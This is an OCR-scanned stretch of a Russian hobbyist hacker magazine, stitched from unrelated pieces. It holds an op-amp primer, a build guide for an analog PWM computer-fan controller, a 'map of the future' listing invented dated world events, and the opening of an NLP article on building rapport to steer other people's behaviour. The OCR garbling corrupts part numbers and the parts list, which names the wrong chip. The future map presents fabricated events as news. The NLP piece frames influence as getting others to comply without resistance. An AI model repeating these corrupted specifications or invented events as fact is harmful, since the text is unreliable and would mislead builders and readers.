можно найти в соответствующем сІаІазбееТ 



«На операционных 



усилителях сделаны 
аналоговые 

імямііміві іцііщ^ іініТіЯД 



0 АНАЛОГ РУЛИТ! 

Цифра может и правит, но я в последнее время 
предпочитаю аналоговую технику. Ряд задач 
автоматики и регулирования на аналоговых 
цепях выполнить в разы проще, чем на мик- 
роконтроллере или цифровой логике. Главное 
отличие от цифровых микрух втом, что тут нет 
четких состояний, а вход и выход могут плавно 
изменяться от минус питания до плюс питания. Основой аналоговой 
схемотехники является операционный усилитель. 

Адская вещь, скажу тебе. Содержит выход и два входа. Один вход 
прямой, другой инверсный. Внутри напряжения по этим двум входам 
математически складываются (с учетом знака входа), а результатум- 
ножается на коэффициентусиления и выдается на выход. Коэффици- 
ент усиления этого девайса в идеальном случае достигает бесконеч- 
ности, а в реальном близок к сотням тысяч. В чем это выражается? А 
в том, что ты подаешь на вход, скажем, 1 милливольт, а выход сразу же 
зашкаливает под максимум — выдавая напряжение питания. Какже 
тогда работать, если его зашкаливает от малейшего сигнала? Зависит 
от задачи. Например, если нам нужно сравнивать два сигнала, то 
один мы подаем на отрицательный вход, а другой на положительный. 

В данном случае выход нам покажет либо минимум напряжения, либо 
максимум, в зависимости оттого, где сигнал больше — на отрицатель- 
ном входе или на положительном. Такой режим работы операционного 
усилителя называется компаратором. Недавно я его применил, чтобы 
отследить просадку напряжения питания на устройстве. Смотри 



ни я с такой скоростью 



ШЕшттшшт 

ШПШШЗШіШ 



схему: на минус у меня идет опорное напряжение со стабилитрона. 

Оно всегда равно 3.3 вольта — за этим стабилитрон и следит. А вот на 
второй вход идет напряжение с делителя — оно зависит отобще- 
го напряжения питания. В нормальном режиме, когда на входе 12 
вольт, с делителя идет порядка 4 вольт, это выше чем 3.3 опорного, и 
с компаратора выходит +5 вольт (максимум питающего). При просад- 
ке напряжения ниже определенного порога, с делителя начинает 
выходить уже менее 3.3 вольт, и компаратор резко перекидывается 
в противоположное положение — 0 вольт (миниум питающего). Этот 
переход отслеживает микроконтроллер и 
дает сигнал тревоги. 

Если от операционного усилителя нужно полу- 
чить усиление, то понадобится как-то обуздать 
его бешеный коэффициент. Для этого ему до- 
бавляют отрицательную обратную связь. Берут 
и с выхода подаютсигнал на отрицательный 
вход, подмешивая его косновному входному 
сигналу. В итоге, выходной сигнал вычитается 
из входного. А коэффициентусиления стано- 
вится равным отношению резисторов на входе 
и выходе (смотри схему). 

Но это далеко не все фишки, которые умеет 
делать операционный усилитель. Если в об- 
ратную связь сунуть конденсатор, то получим 
интегратор, выдающий на выходе интеграл 
от функции входного сигнала. А если ском- 
бинировать конденсатор с резистором, да 
индуктивность на вход... В общем, тут можно 
книгу написать, этими занятными процессами занимается отдельная 
наука — автоматическое управление. Кстати, именно на операцион- 
ныхусилителях сделаны аналоговые компьютеры, считающие диффе- 
ренциальные уравнения с та кой скоростью, что все цифровые компы 



нервно курят в уголке. 



^ ЗАКЛЮЧЕНИЕ 

То, что я сейчас рассказал, является лишь крошечной частью того, что 
тебе еще потребуется изучить и понять. Это даже не основы, это начало 
основ. Но не отчаивайся, изучай, вкуривай и, главное, экспериментируй, 
экспериментируй и еще раз экспериментируй. Тогда, в один прекрасный 
момент, поймав за хвост шальную мысль, ты уже будешьточно знать, как 
реализовать ее в железе. Дерзай! 



Р.З. Если тема будет интересна, то в будущем можно будет двинуть ста- 
тью изтой же области, например, рассказать о функциональных блоках, 
вроде генератора или источника питания. Пиши мылом или лезь в сіі- 
Ьаи.ііѵерипаі.сот и задавай вопросы, что-нибудь придумаем. ~в~ 
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|Схема девайса 



рЬгеакіпд 



Давным-давно, когда я сидел на дорогущем инете с трафиком, я загнался по 
моддингу. Визуально-оформительская часть этого движения была мне по 
барабану, а вот тишины хотелось сильно. В своих изысканиях я наткнулся 
на интересный девайс — реобас. Прочитав текстовое описание, с любопытс- 
твом подгрузил картинки и жестоко обломался — перспектива крутить 
ручки, выставляя скорость вентиляторов, показалась совершенно бредовой. 
Я же ленивый до безумия, либо выставлю на максимум, чтобы получить нор- 
мальное охлаждение, и буду сидеть, слушая свист ветра и вой кулеров, либо 
забуду на минимуме и, в итоге, получу синий экран смерти из-за перегрева. 
Пришлось врубить родимый паяльник и начать изобретать систему управ- 
ления кулерами. 
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В ПРОПОРЦИОНАЛЬНОЕ УПРАВЛЕНИЕ — ЗАЛОГ ТИШИНЫ! 

Какая задача ставится перед нашей системой управления? Да чтобы 
пропеллеры зря не вращались, и была зависимость скорости вращения от 
температуры. Чем горячее девайс — тем быстрей вращается вентилятор. 
Логично? Логично! Натом и порешим. 

Можно, конечно, заморачиваться с микроконтроллерами. Но, на мой взгляд, 
проще и дешевле сделать аналоговую системууправления — не надо будет 
париться с программированием на ассемблере. Кроме простоты в наладке и 
настройке, преимуществом будет, что любой при желании сможет расширить 
и надстроить систему по своему вкусу, добавив каналов и датчиков. Все, что 
оттебя потребуется, это несколько резисторов, одна микросхема и термодат- 
чик. Нуатакже прямые руки и некоторый навык пайки. 



^ СОСТАВ 

Для начала собери необходимое барахло. Однозначно, нам потребует- 
ся паяльник, желательно маломощный, ватт на 40 максимум. Немного 
олова и канифоли, а лучше флюса, вроде ЛТИ-1 20 или горячо любимого 
мною канифоль-геля. Пригодится и пинцет. Еще нам нужен будет кусок 
фол ьгиро ванного текстолита, минимум, четыре на четыре сантиметра. 
Покупается либо в радиомагазине, либо на радиобарахолке у дедов 
старьевщиков. 

Дальше — чип резисторы размера 1 206. Их можно навыпаивать из какой- 
нибудьубитой электроники. Выпаиваются они посредством нагрева платы 
на электроплитке с последующим снятием деталей пинцетом. Или просто 
купи в магазине — средняя цена за один резистор 30 копеек. В конце 
концов, никто не мешаеттебе чуток подправить плату, чтобы на место чип 
резисторов впаятьобычные, с ножками, ауж их влюбом старом транзис- 
торном телевизоре навалом. 

Номиналы тех, что стоят в моей схеме, вынесены на врезку, а я по ходу 
статьи буду объяснять, что на что можно заменить, если вдруг не найдешь 
указанного. 

Продолжим. Потребуется многооборотный переменный резистор пример- 
но на 1 5кОм. Также — чип конденсатор размера 1206 на 470нф (0.47мкФ), 
любой электролитический кондер напряжением от 1 6 вольт и выше и 
емкостью в районе 1 0-1 ООмкФ. Конденсатор можно выковырять изубитого 
блока питания, да и в любой китайской аппаратуре их обычно пруд пруди. 
Винтовые клеммники — пожеланию. Можно просто припаять провода 
к плате, но я поставил клеммник чисто по эстетическим соображениям. 
Девайс должен выглядеть солидно. 

В качестве силового элемента, который и будетуправлять питанием 
кулера, мы возьмем мощный М05РЕТ транзистор. Например, ІНР630 или 
ІПР530. Их иногда можно выдрать из старых блоков питания от компа. 
Конечно, для крохотного пропеллера его мощность избыточна, но мало ли, 
вдругты захочешьтуда что-нибудь помощней всунуть? 

Температуру будем щупать прецизионным датчиком І_М3352, которых я 
заказал нахаляву из корпорации 5Т тісгоеіесігопісв столько, что солить 
можно. Впрочем, он стоит не более десяти рублей и дефицита не представ- 
ляет, да и заменить его при случае можно каким-нибудьтерморезистором, 
благо он тоже не является редкостью. 

Основной деталью, на которой все и основано, является микросхема, 
представляющая из себя четыре операционныхусилителя в одном кор- 
пусе — І_М324Ы, очень популярная штука. Имеет кучу аналогов (І_М124М, 
І_М224І\І0, 1401УД2А), главное убедись, чтобы она была в йІР корпусе (такой 
длинный, с четырнадцатью ножками, как на рисунках]. 

Для красоты и наглядности я разложил это дело на бумажке, чтобы ты мог 
полюбоваться, а сейчас подробно расскажу, как это работает, чтобы ты при 
случае могсо знанием дела переделать все под любую другую задачу. 



Н ЗАМЕЧАТЕЛЬНЫЙ РЕЖИМ — ШИМ 



более хитрым путем — применим широтно-импульсную модуляцию ака ШИМ 
или РѴѴМ. Страшно звучит, но не бойся, тут все просто. Представь, что двига- 
тель это телега. Ты можешь толкать его ногой непрерывно, что равносильно 
прямому включению. А можешь двигать пинками — это и будетШИМ. Чем 
длинней по временитолчокногой.тем сильнееты разгоняешьтелегу. 

При ШИМ на двигатель идетне постоянное напряжение, а прямоугольные 
импульсы, словноты включаешь и выключаешь питание, только быстро, 
десятки раз в секунду. Но двигатель имеет неслабую инерцию и индуктив- 
ность обмоток, поэтому эти импульсы как бы суммируются между собой. То 
есть чем больше суммарная площадь под импульсами в единицу времени, 
тем большее эквивалентное напряжение идет на двигатель. Подаешь 
узенькие, словно иголки, импульсы — двигатель еле вращается, а если 
подать широкие, практически без просветов, то это равносильно прямому 
включению. Включать и выключать двигатель будет наш М05РЕТ транзис- 
тор, а формировать импульсы будет схема. 



^ ПИЛА + ПРЯМАЯ = ? 

Столь хитрый управляющий сигнал получается элементарно. Для этого нам 
надо в компаратор загнать сигнал пилообразной формы и сравнить его 
с каким-либо постоянным напряжением. Смотри на рисунок. Допустим, 
у нас пила идетна отрицательный выход компаратора, а постоянное 
напряжение на положительный. Компаратор складываетэти два сигнала, 
определяет, какой из них больше, а потом выносит вердикт. Если напряже- 
ние на отрицательном входе больше, чем на положительном, то на выходе 
получим ноль вольт, а если положительное больше отрицательного, то на 
выходе напряжение будет около 12 вольт. Пила у нас идет непрерывно, она 
не меняетсвою формусо временем —такой сигнал называется опорным. 

А вот постоянное напряжение может двигаться вверх или вниз, увеличи- 
ваясь или уменьшаясь в зависимости оттемпературы датчика. Чем выше 
температура датчика, тем большее напряжение с него выходит, а значит, 
«напруга» на постоянном входе становится выше и, согласно этому, на 
выходе компаратора импульсы становятся шире, заставляя вентилятор 
крутиться быстрее. Так будет до тех пор, пока постоянное напряжение не 
перекроет пилу, что вызовет включение двигателя на полные обороты. 

Если же температура низкая, то и напряжение на выходе датчика низкое 
и постоянная уйдет ниже самого нижнего зубчика пилы, что вызовет пре- 
кращение вообще каких-либо импульсов и двигатель вообще остановится. 
Загрузил, да? Ничего, мозгам полезно работать. 



Чтобы вентилятор вращался медленней, достаточно снизить его напряже- 
ние. В простейших реобасах это делается посредством переменного резис- 
тора, который ставят последовательно с двигателем. На резисторе упадет 
напряжение, как результат — попадет меньше и на двигатель. В итоге — сни- 
жение оборотов. Где подлость, не замечаешь? Засада в том, что энергия, 
выделившаяся на резисторе, преобразуется не во что-нибудь, а в обычное 
тепло. Тебе нужен обогреватель внутри компа? Явно нет! Поэтому мы пойдем 



^ ТЕМПЕРАТУРНАЯ МАТЕМАТИКА 

В качестве датчика у нас используется І_М3352. По сути, это термостаби- 
литрон. Прикол стабилитрона в том, что на нем, как на ограничительном 
клапане, выпадает строго определенное напряжение. Аутермостабилит- 
рона напряжение зависит оттемпературы. У І_М335 зависимость выглядит, 
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^ рЬгеакіпд 



Готовый девайс 



Подключили вентилятор и начали греть датчик для проверки. 
Разгоняется! 




какІОтѴ* 1 градус по Кельвину. То есть отсчет ведется от абсолютного 
нуля. Ноль по Цельсию равен 273 градусам по Кельвину. Азначит, чтобы по- 
лучить напряжение, выходящее с датчика, скажем, при плюс двадцати пяти 
градусах Цельсия, нам надо кдвадцати пяти прибавить двести семьдесят 
три и умножить полученную сумму на десять милливольт. 

(25+273) *0.01 = 2,98В 

При другихтемпературах напряжение будет меняться несильно, те же 1 0 
милливольт на градус. В этом заключается очередная подстава. 
Напряжение с датчика меняется незначительно, а сравнивать его надо с 
пилой, у которой высота зубьев достигает аж десяти вольт. Чтобы сдатчика 
напрямую получить постоянную составляющую на такое напряжение, нужно 
нагреть его до тысячи градусов — лажа редкостная. Кактогда быть? 

Так кактемпература вряд ли опустится ниже двадцати пяти градусов, то 
все, что ниже этой отметки, нас не интересует. Значит, можно из выходного 
напряжения сдатчика выделить лишь самую верхушку, где происходят все 
изменения. Как? Да просто вычесть из выходного сигнала две целых девя- 
носто восемь сотых вольта. Доставшиеся крохи умножить на коэффициент 



Мой перечень 
элементов 



• Резистор чип 1206 47кОм — 2 шт. 

• Резистор чип 1206 ЗОкОм — 2 шт. 

• Резистор чип 1206 на ІкОм — 2 шт. 

• Резистор чип 1206 на 56 Ом — 1шт. 

• Резистор чип 1206 на 56кОм — 1 шт. 

• Резистор чип 1206 на ЮОкОм — 2 шт. 

• Резистор чип 1206 на 12кОм — 2 шт. 

• Резистор многооборотный, подстроечный на 15 кОм — 1шт. 

• Конденсатор чип 1206 на 470нФ 

• Конденсатор электролитический на ЮОмкФ Ібвольт 

• Термодатчик ЬМ3352 (именно 2, так как бывают в другом корпусе) 

• Микросхема ЦѴТ335К в корпусе БІР 

• Транзистор ІКР630 или аналогичный 

• Текстолит фольгированный, односторонний 4 на 4 см. 

Можешь с этим списком идти в ближайший радиомагазин. Почти 
наверняка там все будет. 



усиления, скажем, на тридцать. Получим порядка 1 0 вольт на пятидесяти 
градусах — и вплоть до нуля на более низкихтемпературах. Таким образом, 
у нас в наличии своеобразноетемпературное «окно» от двадцати пяти до 
пятидесяти градусов, в пределах которого работает регулятор. Ниже двад- 
цати пяти — двигатель выключен, выше пятидесяти — включен напрямую. 
Ну а между этими значениями скорость вентилятора пропорциональна 
температуре. Ширина окна зависит от коэффициента усиления. Чем он 
больше, тем уже окно, так как предельные 1 0 вольт, после которых посто- 
янная составляющая на компараторе будет выше пилы и мотор включится 
напрямую, наступят раньше. Но ведь мы не используем ни микроконтрол- 
лер, ни средства компьютера, какже мы будем делать все эти вычисления? 
А тем же операционным усилителем. Он ведь не зря назван операционным, 
математические операции — его изначальное назначение. На них построе- 
ны все аналоговые компьютеры — потрясающие машины, между прочим. 
Чтобы вычесть одно напряжение из другого, нужно подать их на разные 
входы операционного усилителя. Напряжение стермодатчика подаем на 
положительный вход, а напряжение, которое надо вычесть (напряжение сме- 
щения), подаем на отрицательный. Получается вычитание одного из другого, 
а результатумножается на огромное число, практически на бесконечность. 
Нонам бесконечность не нужна, так как в этом случае температурное окно 
сужается в точку натемпературной шкале, и мы имеем либо стоящий, либо 
бешено вращающийся вентилятор, а нет ничего более раздражающего, чем 
включающийся и выключающийся компрессор совкового холодильника. 
Поэтому, чтобы не получить аналогхолодильника, мы будем понижать коэф- 
фициентусиления, добавляя к нашему вычитателю обратные связи. 

Суть обратной связи в том, чтобы с выхода сигнал загнать обратно на вход. 
Если напряжение с выхода вычитается из входного, то это отрицательная 
обратная связь, а если складывается, то положительная. Положительная 
обратная связьувеличивает коэффициентусиления, но можетпривести 
к генерации сигнала (автоматчики называютэто потерей устойчивости 
системы). Хороший пример положительной обратной связи с потерей 
устойчивости — вспомни, когда ты включаешь микрофон и тычешь им в 
динамик, обычно сразу же раздается противный вой или свист — это и есть 
генерация. Нам же надо уменьшить коэффициентусиления нашего опе- 
рационника до разумных пределов, поэтому мы применим отрицательную 
связь и заведем сигнал с выхода на отрицательный вход. 

Соотношение резисторов обратной связи и входа даст нам коэффициент 
усиления, влияющий на ширину окна регулирования. Я прикинул, что 
тридцати будет достаточно, ты же можешь пересчитать под свои нужды. 

В ПИЛА 

Осталось изготовить пилу, а точнее, собрать генератор пилообразного 
напряжения. Состоять он будет из двух операционников. Первый за 
счет положительной обратной связи оказывается в генераторном режи- 
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ование импульсов ШИМ 



ме, выдавая прямоугольные импульсы, а второй служит интегратором, 
превращая эти прямоугольники в пилообразную форму. Конденсатор в 
обратной связи второго операционного усилителя определяет частоту 
импульсов. Чем меньше емкость конденсатора, тем выше частота, 
и наоборот. В ШИМ генерации действует принцип: «чем больше, 
тем лучше». Но есть один косяк — если частота попадет в слышимый 
диапазон (от20 до 20000Гц), то двигатель будет противно пищать на 
частоте ШИМ, что явно расходится с нашей концепцией бесшумного 
компьютера. А добиться из этой схемы частоты больше, чем пятнад- 
цать килогерц, мне не удалось — звучало отвратительно. Пришлось 
загнать частоту в нижний диапазон, в район двадцати герц. Движок 
начал чуток вибрировать, но неслышно и так, что ощущается только 
пальцами. 

В СХЕМА 

Так-с, с блоками разобрались, пора бы и на схемку поглядеть. Думаю, ты 
уже догадался, что тут к чему. А я все равно поясню, для большей ясности. 
Пунктиром на схеме обозначены функциональные блоки. 

Блок#1 — это генератор пилы. Резисторы Р1 и Р2 образуют делитель 
напряжения, чтобы подать в генератор половину питающего. В принци- 
пе они могут быть любого номинала, главное, чтобы были одинаковыми 
и не шибко большого сопротивления, в пределах сотни кОм. Резистор 
РЗ на пару с конденсатором С1 определяют частоту: чем меньше их но- 
миналы, тем больше частота, но повторюсь, что мне неудалось вывести 
схему за звуковой диапазон, поэтому лучше оставь, какесть. Р4 и Р5 это 
резисторы положительной обратной связи. Также они влияют на высоту 
пилы относительно нуля. В данном случае параметры оптимальные, но 
если не найдешь таких же, то можно брать плюс- ми нус кОм. Главное 
соблюдать пропорцию между их сопротивлениями примерно 1 :2. Если 
сильно снизить Р4, то придется снизить и Р5. 

Блок #2 — это блок сравнен ия, тут происходит формирование ШИМ 
импульсов из пилы и постоянного напряжения. 

Блок #3 — это как раз схема устраивающая вычислениетемпературы. 
Напряжение с термодатчика Ѵйі подается на положительный вход, а на 
отрицательный вход подается напряжение смещения с делителя на В7. 
Вращая ручку подстроечного резистора Н7, можно сдвигать окно регули- 
рования выше или ниже потемпературной шкале. 

Резистор В8 может быть в пределах 5-1 ОкОм. Больше нежелательно, 
меньше — тоже, может с гореть термодатчик. Резисторы РІО и Р1 1 должны 
быть равны между собой. Резисторы Р9 и Р1 2 — тоже. Номинал резисто- 
ров Р9 и РІО может быть в принципе любым, но надо учитывать, что от их 
отношения зависит коэффициентусиления, определяющий ширину окна 
регулирования. Ки = Р9/Р1 0, исходя из этого соотношения, можно выби- 
рать номиналы, главное, чтобы они были не меньше 1 кОм. Оптимальным, 



ет коэффициентов и диапазона 



на мой взгляд, является коэффициент, равный 30, что обеспечивается 
резисторами на 1 кОм и ЗОкОм. 

^ МОНТАЖ 

Девайс выполнен печатным монтажом, чтобы быть компактней и 
аккуратней. Рисунок печатной платы в виде Бауои! файла выложен на 
диске (вместе с программой для просмотра). Сама же печатная плата 
выполняется на раз-два посредством лазеро-утюжной технологии, 
подробное описание которой также лежит в приложении на диске. 
Впрочем, метод пользуют электронщики всей страны, поэтому тех- 
нология уже обсосана на сотне форумов и находится любым поиско- 
виком по запросу «ЛУТ печатная плата». Ничего сложного там нет, а 
значит, у тебя обязательно получится. Если не с первого раза, то со 
второго. 

Когда все детали будут в сборе, а плата вытравлена, можно присту- 
пать к сборке. Резисторы и конденсаторы можешь припаивать без 
опаски, так как они почти не боятся перегрева. Придерживаешь 
детальку пинцетом и слегка касаешься паяльником. Главное, сма- 
зать точки пайки флюсом и слегка облудить, то есть покрыть тонким 
слоем олова. Особую осторожность следует проявить с М05РЕТ 
транзистором. Дело в том, что он боится статического электричес- 
тва. Поэтому, прежде чем доставать его из фольги, в которую тебе 
его завернули в магазине, рекомендую снять с себя синтетическую 
одежду и коснуться рукой оголенной батареи или крана на кухне. 
Микруху можно перегреть, поэтому когда будешь паять ее, то не де- 
ржи паяльник на ножках дольше пары секунд. Ну и еще, напоследок, 
дам совет по резисторам, а точнее по их маркировке. Видишь цифры 
на спинке? Так вот, это сопротивление в Омах, а последняя цифра 
обозначает число нулей после. Например, 103 это 1 0 и 000, то есть 
1 0000 Ом или 1 0кОм. 

^ АПГРЕЙД ДЕЛО ТОНКОЕ 

Если захочешь добавить второй датчик для контроля другого вентилято- 
ра, то совершенно не обязательно городить второй генератор, достаточно 
добавить второй компаратор и схему вычисления, а пилу подать из одного 
и того же источника. Для этого, конечно, придется перерисовать рисунок 
печатной платы, но я думаю, для тебя это не составит большого труда. 

г ИТОГ 

Сижу, печатаю эту статью. Проц не загружен. Системник, стоящий у меня 
почти под ухом, лениво, в пол силы, шуршит вентиляторами. За окном мо- 
розно, приоткрыл форточку — компьютер вообще затаился. Автоматика, 
блин! Тишина стоиттого, чтобы ради нее посидеть вечерокс паяльником. 
Удачи, фрикер! ЗЕ 
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!о 2 . 2 035 год ? 



из будущего 



у//////////////м^^^ 






///////////////////ж^^ 



2020 



2010 



Карта будущего 



01 . Куба 

2020. Гавана. Национальная ассамблея 
Кубы большинством голосов приняла 
решение о вступлении в состав 
Соединенных Штатов в качестве 
51-го штата. 

02 . США 

2035. Вашингтон. По решению Конгресса 
США столица Соединенных Штатов 
переносится из Вашингтона в Сиэтл. 

03. США 

2022 . Съезд Республиканской партии США 
официально выдвинул кандидатуру Билла 
Гейтса на второй президентский срок. 

04 . США 

2015. Сан-Франциско. Компания Соодіе 
объявила о намерении приобрести 
корпорацию Арріе за 150 миллиардов 
долларов . 



05 . Бразилия 

2038. Ассоциация государств- 
экспортеров пресной воды - Бразилия, 
Россия, Дания (Гренландия) - приняла 
решение ограничить поставки воды на 
мировой рынок в ответ 

на оккупацию коалиционными силами США 
и Великобритании 2/3 Антарктиды. 

0 6 . Бельгия 

2045. Брюссель. На чрезвычайной сессии 
парламента Европейского Союза было 
принято решение о начале эвакуации 
жителей прибрежных территорий 
Нидерландов, Бельгии и Дании вглубь 
континента . Эвакуация должна 
завершиться в феврале 2050 года. 

07 . Швейцария 

2 012. ЦЕЕА приняла решение о переносе 
Чемпионата Европы по футболу, который 



должен был пройти в Польше и Украине, 
в Англию - в связи с неготовностью 
к соревнованию вышеуказанных 
восточно-европейских стран. 

08 . Исландия 

2030. В Рейкьявике торжественно 
закрыта последняя бензоколонка. 
Исландия стала первой страной в мире, 
полностью перешедшей на водородное 
топливо . 

0 9 . Нигерия 

2040. В Абудже, столице Нигерии, прошли 
37-е Летние Олимпийские игры. В ходе 
соревнований марафонская дистанция 
была впервые в истории человечества 
преодолена быстрее 2 часов . 

10 . Великобритания 

2018. Парламент Великобритании 

принял решение о выходе из состава 








18. ' 2050 год 



Европейского Союза. 

1 1 . Россия 

2016. Евгений Чичваркин выставил свою 
кандидатуру на президентских выборах. 

12 . Австрия 

2035. В связи с глобальным 
потеплением Аизбгіап Аіріпе Аззо- 
сіабіоп констатирует, что более 90% 
всего объема и площади австрийских 
альпийских ледников может исчезнуть 
уже к концу XXI века ! 

13 . Индия 

2030. Население Индии превысило 
население Китая. Страны сравнялись 
в 2029 году 

на отметке 1,5 миллиарда жителей. 

14 . Пакистан 

2009. Атомный взрыв в Пакистане. 
Страны ООН голосуют за полный запрет 



ядерного оружия в мире . 

15 . Китай 

2020. По статистике, Китай стал самой 
большой англоговорящей страной в мире . 
Кроме того. Поднебесная обогнала США 
по номинальному ВВП - $29,3 триллиона. 
В стране 1 миллиард владельцев сотовых 
телефонов . 

1 6 . Тайвань 

2035. Самый жаркий год в истории 
Тайваня . Впервые средняя температура 
за три летних месяца превысила 
35 градусов Цельсия. 

17 . Антарктида 

2010. Криоробот, предназначенный 
для поиска жизни в океане спутника 
Юпитера, проник к озеру «Восток» 
в центре континента. Озеро, отрезанное 
от окружающего мира более миллиона 



лет, стало первым испытательным 
полигоном для робота. 

18. 2050. Население Земли превысило 
9 миллиардов человек. 



Уже в продаже 






;ЛННА «МЕНОѴЦ5НКА» КОНДРАТЬЕВА! 



МЕНОѴІІ5НЕСНКА@/АМРЕХ.ЯЦ 



Р8ѴСНО 



ЕХНИКИ НЕЙРОЛИНГВИСТИЧЕСКОГО программирования или взгляд из-за угла 



Нейролингвистическое программирование — сравнительно молодое на- 
правление психотерапии, при этом успевшее обрасти таким количеством 
мифов, что другим направлениям психологии и психотерапии и не снилось 
Почему же именно НЛП приписывают мистические свойства и возводят 
его в ранг сверхтехнологий? Действительно ли НЛП может изменить нашу 
жизнь, помочь завоевать симпатии, стать инструментом программирова- 
ния поведения окружающих или это все выдумки, не имеющие ничего об- 
щего с реальностью? Попробуем разобраться. 



* ПОЧЕМУ НЛП? 

Откроютебе страшную тай ну: иты, и я, и вообще все люди функционируют 
на двух уровнях. Первый — нейрологический, он же физиологический. И 
второй — лингвистический, он же сознательный уровень слов, названий и 
определений. Вот откуда появилосьопределение: нейролингвистическое. 
Теперь разберемся, почему программирование, а не, скажем, нейролин- 



гвистическая гимнастика. Какты догадываешься, здесь есть кое-что общее 
с таким и языками программирования, как С++ или ОеІрЫ. Программирова- 
ние — это искусственный язык, предназначенный для записи алгоритмов. 
Из известныхтебе методов и классовтого или иного языка ты пишешь 
своюуникальную программу. Так вот в нейролингвистическом програм- 
мировании все то же самое. При помощи известных и когда-то описан- 
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ных паттернов (в переводе с англ. — шаблон, образец, клише), которые 
приводят куспеху, ты можешь программировать свое поведение и влиять 
на окружающих. И никакой мистики или насилия надличностью. НЛП 
предлагает изменять сиюминутное или долгосрочное поведение человека, 
но не самуличность. 

X КАЛИБРОВКА 

Когда мы занимаемся калибровкой чего-либо, скажем, двигателя в автомо- 
биле, то мы должны знать и сходную точку, относительно которой осущест- 
вляется калибровка. В НЛП, прежде чем осуществлять какое-то воздейс- 
твие, необходимо понять текущее состояние собеседника и относительно 
этого состояния оценивать все его последующее поведение. В калибровке 
важно найти исходное (нулевое) состояние собеседника. В разные момен- 
ты времени у человека можетбыть разное нулевое состояние, что уникаль- 
ным образом выражается во внешнем поведении. Каждому состоянию 
свойственна определенная жестикуляция, мимика, тон голоса, темп и даже 
ритм речи. В калибровке нам важно замечать эти состояния и запоминать 
их невербальные проявления. То есть исходное состояние — та самаяточка 
отсчета, а любые изменения — это то, что нас будет интересовать. 

Помнишь, мыстобойуже говорили отакой вещи, как соответствие вербальных 
сигналов и не вербальных, — это так называемая конгруэнтность (взаимное 
соответствие между тем, чточеловекделаетитем, что говорит). Несогласо- 
ванность сигналов уже сама по себе говоритотом, что обсуждаемая тема 
является значимой или болезненной для нашего собеседника, и с этим уже 
можно работать. Самая большая ошибка втрактовке конгруэтности/неконгру- 
энтности заключается в шаблонном приписывании стандартных объяснений 
невербальным сигналам. Например, если у человека покраснело лицо, это не 
обязательно означает, чтоу него повышенный эмоциональный фон. Возмож- 
но, просто проблемы сдавлением. Об этом всегда нужно помнить. 

Если ты хочешь стать хорошим НЛПишником ,то важно научиться сканиро- 
вать не сам свершившийся факт покраснения лица или факт скрещенных 
на груди рук, а момент перехода человека из одного состояния в другое. 
Собеседник еще только дернул плечом, а ты уже изменил свое поведение, 
уже ведешь его в другую сторону. Отслеживание изменений относительно 
того или иного состояния и есть суть калибровки. Если ты поздно пришел 
домой, не позвонив предварительно родителям.то, заходя в квартиру, тебе 
не нужно быть НЛ П-мастером, чтобы понять изменившиеся эмоциональные 
состояния матери и отца относительно их обычного (нулевого) состояния и 
скорректировать свое поведение, стратегию, если хочешь. Это и есть самый 
простой пример калибровки. А научиться отличать все нюансы состояний 
относительно разных нулевыхточек, да еще и у незнакомых людей — это уже 
искусство. Овладеть им тебе вполне по силам, если будетжелание. 

X ПОДСТРОЙКА ИЛИ ЗАГАДОЧНЫЙ РАППОРТ 

От калибровки логичным будет переход через подстройку к раппорту. По- 
смотрим, что такое подстройка с раппортом, и как это можно использовать 
во благо. Раппорт — процесс построения и поддержания взаимного доверия 



и понимания между двумя или болеелюдьми. Раппортом можно назвать 
состояние, когда ты просишь близкого друга о чем-либо, и он делаетэто, не 
спрашивая, зачем. То есть раппортэто такое состояние твоего собеседника, 
когда любое действие, которого ты хочешь от него добиться, не вызыва- 
ет противодействия. Идеальным примером раппорта будет состояние 
влюбленности. Например, когда твоя девушка делает для тебя что-либо без 
лишних слов и сопротивления, даже если это ей не совсем комфортно. 
Раппорт состоит из трех процессов: калибровка (о ней ты уже знаешь), 
подстройка и ведение (воздействие на поведение). Подстройка — это за- 
имствование деталей поведения (позы, мимики, интонаций и т.д.) другого 
человека с целью создания или усиления раппорта. Именно при помощи 
подстройкиты достигаешь состояния раппорта. Обнаруживал литы когда- 
нибудь, что, разговаривая с понравившейся тебе девушкой, невольно 
копируешь ее позу? Это подстройка потелу произошла автоматически, 
без усилий с твоей стороны. Твоя задача научиться делать это осознанно, 
причем не только с теми, кто тебе нравится, а со всеми, с кем тебе нужен 
раппорт, стеми, на чье поведениеты хочешь научиться влиять. Итак, для 
достижения раппорта мы с тобой будем использовать подстройку, как метод 
достижения сходства. Бывают подстройки потелу, по ритму и дыханию, по 
убеждению и ценностям, по ключевым словам — и много других разных и 
интересных подстроек. Расскажу про некоторые из них. 

X ПОДСТРОЙКА ПО ТЕЛУ 

Один из распространенных мифов в НЛП — это миф оточном и обяза- 
тельном копировании позы собеседника. Однако на самом деле суть 
подстройки по телу заключается не столько в копировании позы, сколько 
в напряжении техже групп мышц, что и утвоего собеседника, в удержании 
того же центра тяжести. При этом важно выполнять подстройку с меньшей 
интенсивностью, чем оригинальные действия собеседника. Например, 
девушка рассмеялась, ты только улыбнулся. Босс закинул ногу на ногу, ты 
лишь скрестил щиколотки. И так далее. 

X ПОДСТРОЙКА ПО ДЫХАНИЮ 

На 100% копировать дыхание партнера, опять же, ни кчему. Твоя задача 
попасть на начало вдоха и конец выдоха. Скажем, если на четыре дыхания 
собеседника приходится лишь два твоих, то важно, чтобы начало и конец 
цикла ваших дыханий совпадали. Подстройка по дыханию приближает 
тебя кфизиологическому состоянию собеседника. Самый яркий примерта- 
кой подстройки можно увидетьу непьющего человека в пьяной компании. 
Вроде и не пил, а состояние нетрезвое. 

X ПОДСТРОЙКА ПО УБЕЖДЕНИЯМ 

Демонстрируя собеседнику, что ты разделяешь его основные ценности, 
ты совершаешь подстройку по ценностям. И это уже не низкоуровневые 
подстройки по телу-дыханию. Задача сложнее и тоньше, требует некото- 
рой гибкости мышления и взглядов. Давай посмотрим на примере, какэто 
работает. Допустим, одной из ценностей твоей девушки является точка 
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зрения: «Взлом — это плохо». Учитывая, что для подстройки тебе нужно 
согласиться, а сделать это трудновато — посмотри, что в ее фразе вызывает 
сопротивление. Слово: «плохо»? Отлично. Давай заменим на «иногда пло- 
хо». Получим: «Взлом — это иногда плохо». С этим уже легче согласиться, 
правда же? Таким образом, то, с чем нам трудно согласиться, необходимо 
расширить, обобщить или, наоборот, сузить, и тогда ты демонстрируешь 
девушке, что ты с ней согласен, не нарушаешь ее ценностей, но остаешься 
совершенно искренним. Вотты уже и подстроился. И даже если собесед- 
